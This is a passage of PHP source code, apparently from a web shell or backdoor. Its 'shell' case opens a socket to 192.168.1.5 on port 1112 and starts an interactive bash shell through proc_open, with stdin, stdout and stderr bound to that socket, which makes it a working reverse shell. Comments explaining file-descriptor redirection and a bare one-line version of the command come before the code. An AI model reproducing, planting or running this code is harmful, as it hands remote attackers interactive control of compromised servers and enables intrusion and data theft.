uname -a; w; id; /bin/sh -i


case 'shell':

	// 0=stdin
	// 1=stdout
	// 2=stderr

	// ">&"				===> re-directs output of one file to another
	// 0<&-, <&- 		===> close stdin
	// 1>&-, >&- 		===> close stout
	// 'n<&-' or 'n>&-' ===> close input/output fd 'n'

	//  <&2 			===> stdin to stderr
	//  >&2				===> all stdout to stderr
	//	1>&2			===> stdout to stderr

	
	chdir("/");

	$sock = fsockopen("192.168.1.5",1112);
 	$descriptorspec = array(
        0 => array("pipe", "r"),	// stdin
        1 => array("pipe", "w"),	// stdout
        2 => array("pipe", "w"),    // stderr
    	3 => $sock 					// socket file descriptor
    );
    $command = 'uname -a; w; id; >&1 /bin/bash -i <&3 >&3 2>&3;';
    $process = proc_open($command, $descriptorspec, $pipes);

    if (!is_resource($process)) {
    	echo "Shell spawn failed.\n";
    	exit(1);
	}

    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    fclose($sock);

    $return_value = proc_close($process);
	break;